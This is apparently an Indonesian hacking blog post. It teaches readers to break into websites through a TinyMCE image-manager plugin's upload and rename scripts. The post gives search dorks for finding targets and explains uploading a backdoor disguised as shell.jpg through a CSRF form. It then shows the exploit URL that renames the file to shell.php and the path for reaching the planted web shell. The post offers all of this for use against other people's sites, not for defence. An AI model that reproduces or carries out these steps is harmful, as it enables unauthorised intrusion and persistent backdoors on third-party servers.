vulnerability TinyMce plugins image Manager
vulnerability TinyMce plugins image Manager
assalamualaikum mang , ketemu lagi dengan saya kali ini saya akan berbagi tutorial inject TinyMce plugins , meng upload file termasuk backdoor kedalam web target .
jika upload backdoor kita siapin terlebih dahulu backdoor yang telah di rename ke ekstensi .jpg
contoh shell.jpg
( lebih baik menggunakan uploader / mini shell , baru nanti kalo sudah tertanam , tanam ulang menggunakan shell besar )
dork :
inurl:/tinymce/plugins/image/
inurl:/tinymce/plugins/image/upload.php
inurl:/tinymce/plugins/image/uploads/
kembangin ~
exploit :
site.com/[path]/tinymce/plugins/image/upload.php
jika muncul tulisan seperti itu kita lanjutkan ke tahap selanjutnya , jika not found cari web lain saja hehehe ,
setelah itu langsung kita pakai CSRF
CSRF ONLINE DISINI
URL isi site target nya
POST file : upl
kunci target
pilih file backdoor kita ( berbentuk jpg )
klik upload file
file sukses ke upload dengan nama FILE-20180606-1330UMKFHD3A48ZA.jpg
kita rename file tersebut menjadi file yang ber ekstensi .php supaya menjadi backdoor lagi dengan cara sebagai berikut
/rename_file.php?current_name=file-backdoor.jpg&new_name=shell.php
contoh :
http://********.com/[path]/tinymce/plugins/image/rename_file.php?current_name=FILE-20180606-1330UMKFHD3A48ZA.jpg&new_name=shell.php
lihat URL pada gambar diatas supaya gak bingung :'v
kalo muncul text succes dan banyak seperti itu maka file kita berhasil kita rename menjadi shell.php
cara akses file yang telah di upload :
http://site.com/[path]/tinymce/plugins/image/uploads/shell.php
sekian semoga bermanfaat :v
wassalamualaikum wr.wb
thanks to ./SpecimenT Hacker Patah Hati
terinspirsi dari https://www.panel-pekok.ga/2018/06/tinymce-image-manager.html
Komentar
Posting Komentar